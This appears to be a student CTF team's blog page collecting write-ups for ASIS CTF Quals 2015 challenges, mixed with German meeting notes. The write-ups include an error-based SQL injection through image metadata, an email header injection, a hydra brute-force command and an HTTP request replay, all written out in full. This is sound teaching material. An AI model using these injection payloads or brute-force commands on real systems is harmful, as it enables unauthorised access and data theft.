Writeup ASIS CTF Quals 2015 – Saw this 1

Writeup by Adrian Müller, Tobias Pawelke
Challenge Name: Saw this 1
Value: 100 Points

Executing the binary presented us with a prompt asking for our name. Filling this prompt printed the message “Welcome $name” which is important later on. Next the program asks for a lucky number between 0-100. After entering a number in the specified range, the game prompts for a random amount of numbers. After inputing arbitrary numbers, the program exits after printing a failure message.

Bild1

Disassembling the binary revealed that upon entering the correct numbers, a text file not included with the binary would be printed. We assumed the flag to be in this file. The correct answers were randomly generated each run.

We found that the name string was stored in a global variable. While it was not possible to write across the array boundaries of the 64 byte char array, we discovered that the seed used by the pseudorandom-generator was stored directly behind the name string. We found that the trailing 0-byte in the name string would be omitted if the user filled the whole 64 characters, which in turn echoed the name and the seed.

Bild2

Since the binary data was not readable in netcat, we used Wireshark to extract the random seed used on the remote host. Afterwards we debugged the binary locally and changed the seed to use the same as the remote one. We then let the program generate the expected answers locally and retrieved them using the debugger. We were met with another difficulty because the connection was closed after one minute by the remote host. Entering these numbers quickly enough on the remote host presented us with the token. It also included a hint to achieve access to a shell for the second part of the challenge:

How can I call you? 1234567890123456789012345678901234567890123456789012345678901234
!come, 1234567890123456789012345678901234567890123456789012345678901234�
Choose your lucky number (1-100)! But choose wisely, your life depends on it: 0
I’ve thought of 4 numbers. If you guess them correctly, you are free!
Number #1: 169
Number #2: 194
Number #3: 121
Number #4: 76
YOU WON! You are free now!

Flag 1: ASIS{109096cca8948d1cebee782a11d2472b}

Protokoll Termin 4

Heute wurde ein Vortrag zum Thema Hash-Cracking und Kryptoanalyse gehalten.

Die Folien gibt’s hier.

Protokoll Termin 3

Heute wurde das Thema Return Oriented Programming  von Matthias vorgestellt.

Hier könnt ihr die Folien downloaden.

Writeup ASIS CTF Quals 2015 – Strange Authen

Writeup by Florian Ammon@Brutewoorse

Challenge Name: Strange Authen

Value: 225 Points

In this challenge we do have a .htaccess authentication at the login page. After analyzing the startpage, we’ll have a look at robots.txt.

strange0

There are two folders listed. To solve this challenge, we need to have a look at the /misc folder,

 

strange1

There is some network traffic given. We open this file with wireshark and have a look if we can find something interesting.

strange2

We know we need the http traffic to our site. So we can use the string ‘http && ip.addr == 217.218.48.85’ to filter the data packets.
We have found a successfull request to /login.php and to /7he_most_super_s3cr3t_page.php. The second file sounds interesting, so we are going to extract the received data from this page request. We can do this by: File -> Export Objects -> HTTP -> Packet 3081 -> Save
After saving the file, we have a look at it and find this interesting line:

flor@debian:~/Downloads$ cat 7he_most_super_s3cr3t_page.php | grep ASIS
[...]
                Welcome factoreal, nice to see you again!<br />Woow! Great you found me! <!-- ASIS{flag_must_be_here} --<>br /><a href="login.php?destroysession"> LogOut </a>

So, lets visit this site

strange4

It says we have to login first. So, lets try to do a replay of the successfull request from our dump file. To do so, we need the GET request: Packet 3079 -> Right Click -> Copy -> Bytes -> Printable Text Only

GET /7he_most_super_s3cr3t_page.php HTTP/1.1
Host: strangeauthen.asis-ctf.ir
Connection: keep-alive
Authorization: Digest username="factoreal", realm="this page for admin only, go out now!", nonce="554aed8c0b2d8", uri="/7he_most_super_s3cr3t_page.php", response="587bb0cf4968b88fdf00c8ae81ff8bf4", opaque="d073cc4342291e6270746b4675498022", qop=auth, nc=00000002, cnonce="bd65e746ecf4d7e7"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
DNT: 1
Referer: http://strangeauthen.asis-ctf.ir/login.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,fa;q=0.6,de;q=0.4
Cookie: PHPSESSID=hkgvkkaoq60v2bv613r2uouq22

We save this request as file “get”, remove gzip fom “Accept Encoding” and use netcat for sending it to the server

ctf@debian:~$ nc 217.218.48.85 80 < get
[...]
Welcome factoreal, nice to see you again!<br />Congratz! Great you found me! <!-- ASIS{004efe5ec5867811f4f13bc8f9921517} --><br /><a href="login.php?destroysession"> LogOut </a>
[...]

There it is!

Writeup ASIS CTF Quals 2015 – Best Photo

Writeup by Florian Ammon@Brutewoorse

Challenge Name: Best Photo

Value: 175 Points

In this Challenge we can upload files to a website. If we upload an image, the website prints its metadata.

bestphoto1

If there is some sql-stuff is going on, we might could inject some SQL code by using a metatag. We choose exiftool for manipulating metadata.

flor@debian:~/Downloads$ exiftool -documentname="sammax.png' OR '1'='1" sammax.png

bestphoto2

Our test has been a great success. So we try to comment out that stuff following by our SQL injection

flor@debian:~/Downloads$ exiftool -documentname="sammax.png' OR '1'='1' +--" sammax.png
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'X Resolution":"72","Y Resolution":"72","Resolution Unit":"inches","Y Cb Cr Posit' at line 1

It seems we have broken our SQL syntax. Lets see if there are some brackets needed, perhaps because of an INSERT statement. Also we would like to know something more about the table schemata, to read from the database by duplicate keys

exiftool -documentname="sammax.png'), ((SELECT schema_name FROM information_schema.schemata LIMIT 1,1)) -- #" sammax.png
Column count doesn't match value count at row 1

This sounds pretty good. Lets try to add one more value:

flor@debian:~/Downloads$ exiftool -documentname="sammax.png'), ((SELECT schema_name FROM information_schema.schemata LIMIT 1,1),'123' ) -- #" sammax.png

This Injection was successfull. We will see broken json as a result

bestphoto3

By doing this again, we get the following message:

Duplicate entry 'photo' for key 'PRIMARY'

Now we can browse through the information_schema database. Maybe we’ll find some interesting entries. We have to upload the picture with our SQL twice, because we need that error which tells us that the value already exists.

flor@debian:~/Downloads$ exiftool -documentname="sammax.png'), ((SELECT table_name FROM information_schema.tables WHERE table_schema='photo' LIMIT 1,1),'123' ) -- #" sammax.jpg
Duplicate entry 'tbl_flag_000' for key 'PRIMARY'

flor@debian:~/Downloads$ exiftool -documentname="sammax.png'), ((SELECT concat(col.table_name,'-',col.column_name) FROM information_schema.columns AS col WHERE table_name = 'tbl_flag_000' LIMIT 1), '100003') -- #" sammax.png
Duplicate entry 'tbl_flag_000-id' for key 'PRIMARY'

flor@debian:~/Downloads$ exiftool -documentname="sammax.png'), ((SELECT concat(col.table_name,'-',col.column_name) FROM information_schema.columns AS col WHERE table_name = 'tbl_flag_000' LIMIT 1,2), '100003') -- #" sammax.png
Duplicate entry 'tbl_flag_000-flag' for key 'PRIMARY'

flor@debian:~/Downloads$ exiftool -documentname="sammax.png'), ((SELECT flag FROM tbl_flag_000 LIMIT 1), '100003') -- #" sammax.png
Duplicate entry 'ASIS{908cd5cf7e6f337d232370ce7e0fd937}' for key 'PRIMARY'

Thats it :)

 

Protokoll Termin 1 und 2

Am 4. Mai hat David und Axel das Thema “Einführung in Reverse Engineering” vorgestellt.

Die Folien sind hier zu finden. Das Assemblerprogramm “Hello World” könnt ihr hier downloaden.

Am 11. Mai hat Florian das Thema “XSS” präsentiert.

Die Folien sind hier zu finden.

Writeup ASIS CTF Quals 2015 – Secret Message

Writeup by Florian Ammon@Brutewoorse

Challenge Name: Secret Message

Value: 150 Points

First of all, we have a look at the services our vulnerable Web-Service has got. As we can see, there is a Contact Form and a Login. We try to send a message with our Contact Form and see how it works.

secmes0

There is a Javascript validation for our entered data. After solving the captcha and sending our Message, we’ll get a Success message.

secmes1

Now we want to try to send a message with some invalid data. To do that, we need to know the URL our data is sent to. Also we have to get the captcha. To get our information, we have a look at the source:

secmes2

secmes3

We notice that the mail is sent with PHP X-Mailer, as mentioned in the source. Now we’ll request a new captcha:
flor@debian:~/write-up/secmes$ curl -sv http://secretmessage.asis-ctf.ir/captcha_code_file.php?rand= > captcha
[…]
< Set-Cookie: PHPSESSID=3go94lp40o30sca68e50ud6ck2; path=/
[…]

secmes4

And within this request, we got the PHPSESSID we have to use for our further steps.

We have a look at the PHP documentation for mail()

$empfaenger = 'niemand@example.com';
$betreff = 'Der Betreff';
$nachricht = 'Hallo';
$header = 'From: webmaster@example.com' . "\r\n" . 'Reply-To: webmaster@example.com' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); mail($empfaenger, $betreff, $nachricht, $header);

The idea is, to set us as Bcc. Maybe there is a secret inside the mail. Because we will send our Request with curl, we are going to write our data in a file. After doing this, we’ll send our Request

flor@debian:~/write-up/secmes$ touch mail
flor@debian:~/write-up/secmes$ echo jdoe@mail.tld >> mail
flor@debian:~/write-up/secmes$ echo Bcc: my@mail.tld >> mail
flor@debian:~/write-up/secmes$ curl --cookie PHPSESSID=3go94lp40o30sca68e50ud6ck2 --data-urlencode name=jdoe --data-urlencode email@mail --data-urlencode message=gotcha --data-urlencode submit=Submit --data-urlencode 6_letters_code=h36cpr -v http://secretmessage.asis-ctf.ir/contact.php | grep Success

[…]

> Cookie: PHPSESSID=3go94lp40o30sca68e50ud6ck2

Success! Your message has been sent successfully.
The mail should be sent to us.

secmes5

Our mail mentions the Mail address of our Admin. Now we try to do a wordlist attack. We choose ‘rockyou.txt’.

flor@debian:~/write-up/secmes$ hydra secretmessage.asis-ctf.ir http-form-post "/login.php:email=^USER^&password=^PASS^&submit=:invalid" -l awareneo@gmail.com -P /usr/share/wordlists/rockyou.txt -t 10 -w 30 -o output.txt

flor@debian:~/write-up/secmes$ cat output.txt
# Hydra v7.6 run at 2015-05-10 17:07:24 on secretmessage.asis-ctf.ir http-post-form (hydra -l awareneo@gmail.com -P /usr/share/wordlists/rockyou.txt -t 10 -w 30 -o output.txt secretmessage.asis-ctf.ir http-post-form /login.php:email=^USER^&password=^PASS^&submit=:invalid)
[80][www-form] host: 217.218.48.85 login: awareneo@gmail.com password: mustang

We got our password. Now we have to Login
secmes6
secmes7
We can see a encoded Message from the NSA. Maybe it’s Base64 encoded

flor@debian:~/write-up/secmes$ echo QVNJU3tkNGZmZGFkNDU3NDFmODFiOWIzYjcwOThkZDc5MDMxYX0K > flag
flor@debian:~/write-up/secmes$ base64 -d flag
ASIS{d4ffdad45741f81b9b3b7098dd79031a}

Congrats, we got it!

Writeup ASIS CTF Quals 2015 – Keka Bomb

Writeup by Matthias Hanreich@Brutewoorse

Challenge Name: Keka Bomb

Value: 75 Points
As usual for this CTF, we have an XZ compressed archive which can be extracted with

7z e keka_bomb_9e0f1863259c578f3231b5cfbc10e258

What do we get? Another 7-zip archive. Taking a look at it with

7z l keka_bomb_9e0f1863259c578f3231b5cfbc10e258~

shows 16 additional 7-zip archives with 4 GB each.

01_Overview
Wait, what? 67 GB within a 10 KB file? That sounds a lot like a zip bomb (Surprisingly, as the name of the challenge is keka bomb; keka is an archive tool for MAC)
A characteristic of zip bombs is that it contains nested archives with big files to overflow the hard disk of the victim.

So, what shall we do? We don’t know the nesting level and each archive per level contains another 67 GB. Extracting all zip files is no option. To achive high copmression rates,
the archives have less or none entropy and often consist of one single character while the flag itself has a higher entropy due to different characters. Therefore we can utilise
a 7z function to compare the CRC sums of all files within an archive and see whether we can spot a difference.

7z l -slt keka_bomb_9e0f1863259c578f3231b5cfbc10e258~ | grep -E "Path|CRC"

02_CRC013

As we can see, we have one archive with a different CRC sum. Let’s extract it with

7z e keka_bomb_9e0f1863259c578f3231b5cfbc10e258~ 013.7z

and investigate it again. We repeat these steps until we reach a final file.

7z l -slt 013.7z | grep -E "Path|CRC"

03_CRC0009

7z e 013.7z 0009.7z
7z l -slt 0009.7z | grep -E "Path|CRC"

04_CRC0000007

7z e 0009.7z 0000007.7z
7z l -slt 0000007.7z | grep -E "Path|CRC"

05_CRC0000000008

7z e 0000007.7z 0000000008.7z
7z l -slt 0000000008.7z | grep -E "Path|CRC"

06_CRCbomb_08
After four nestings we find the final file bomb_08. A quick search with

strings bomb_08

shows us the flag

ASIS{f974da3203d155826974f4a66735a20b}
07_FLAG

CTF Kickoff-Meeting SS2015

Das Auftakttreffen des CTF-Teams fand am vergangenen Montag (20.04.2015) statt. Nach einer Vorstellung unseres Team und den geplanten Abläufen für dieses Sommersemester durch Florian und einem Vortrag für CTF-Einsteiger, wurden fünf Challenges unseres diesjährigen CTF-Events von ihren jeweiligen Autoren aufgelöst.

  • Florian – Kostenlose Kekse
  • Johanna – Salt & Pepper
  • Daniel – Verschachtelt
  • Fabrice – Wer hats erfunden
  • David – Gute Argumente

Solltet ihr das Kickoff-Meeting verpasst haben, schaut euch einfach Florians Folien an und werft einen Blick in unser Wiki (Login für alle angemeldeten Teilnehmer mit h_da st-account). Dort findet ihr eine Linksammlung, die euch den Einstieg erleichtern sollte sowie in den nächsten Tagen auch die Write-Ups unserer eigenen Challenges. Wenn ihr noch Fragen habt, schickt uns eine Mail oder schaut bei einem unserer Treffen vorbei, ihr seid herzlich willkommen!
Wir treffen uns dieses Semester immer montags um 19:30 Uhr. Das nächste Treffen findet am 4. Mai in Raum 0.13 im Gebäude D14 der Hochschule statt. Das Thema des ersten Vortrages wird ‘Eine Einführung ins Reversing’ sein.

Im Sommersemester 2015 einsteigen!

Demnächst startet das Sommersemester und wir sind wieder auf der Suche nach neuen Mitgliedern für unser Team.

Alle Infos findet ihr auf dem Poster:

CTFposter

Download Poster als PDF: 2015-CTFposter

CTF-Challenge

Unter dem Link https://ucs.fbi.h-da.de/challenge könnt ihr euch selbst testen und schauen, ob das CTF-Team das richtige für euch ist!

challenge

Wir würden uns freuen einige von euch demnächst bei uns zu sehen!